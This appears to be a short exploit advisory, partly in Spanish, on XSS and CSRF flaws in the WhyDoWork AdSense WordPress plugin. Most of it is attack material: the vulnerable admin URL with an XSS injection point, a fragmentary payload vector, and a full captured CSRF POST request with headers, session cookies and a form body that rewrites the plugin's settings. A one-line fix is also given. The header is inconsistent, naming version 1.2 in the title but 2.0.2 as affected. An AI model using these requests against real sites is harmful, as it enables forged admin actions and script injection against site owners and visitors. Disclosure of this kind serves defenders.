########################################################################################### # Exploit Title: WhyDoWork AdSense Plugin 1.2 - XSS and CSRF # Date: 28 de Julio del 2014 # Exploit Author: Dylan Irzi # Credit goes for: websecuritydev.com # Vendor Homepage: https://wordpress.org/plugins/whydowork-adsense/ # Tested on: Win7 & Linux Mint # Affected Version : 2.0.2 & Anteriores. # Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/} Affected items - Archivos Afectados. http://localhost/wordpress/wp-admin/options-general.php?page=whydowork_adsense&idcode=1[XSS CODE] Prueba de Concepto PoC: Vector: "> Variable Afectada: $idx Fix: wp_specialchars($idx); Linea: 118,127,143,147 CSRF Vulnerability: POST URL: http://localhost/wordpress/wp-admin/options-general.php?page=whydowork_adsense&idcode=1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-co Accept-Encoding: gzip, deflate Referer: http://localhost/wordpress/wp-admin/options-general.php?page=whydowork_adsense&idcode=1 Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=hacking%7C1406766762%7C0a0ccdb16a9d99c2b9113e25e2ea6b8d; wp-settings-time-1=1406489836; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=loreleitaron%7C1406766762%7C667e59a36d4254c8a178580770ac5135 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 843 CONTENIDO POST: idx=1&whydowork_code=tets&whydowork_exclude=&whydowork_front_code_1=FALSE&whydowork_front_pos_1=top&whydowork_front_post_1=1&whydowork_front_code_2=FALSE&whydowork_front_pos_2=top&whydowork_front_post_2=1&whydowork_front_code_3=FALSE&whydowork_front_pos_3=top&whydowork_front_post_3=1&whydowork_page_code_1=FALSE&whydowork_page_pos_1=top&whydowork_page_code_2=FALSE&whydowork_page_pos_2=top&whydowork_page_code_3=FALSE&whydowork_page_pos_3=top&whydowork_single_code_1=FALSE&whydowork_single_pos_1=top&whydowork_single_code_2=FALSE&whydowork_single_pos_2=top&whydowork_single_code_3=FALSE&whydowork_single_pos_3=top&whydowork_singleold_code_1=FALSE&whydowork_singleold_pos_1=top&whydowork_singleold_code_2=FALSE&whydowork_singleold_pos_2=top&whydowork_singleold_code_3=FALSE&whydowork_singleold_pos_3=top&whydowork_adsense_oldday=&Submit=Update ###########################################################################################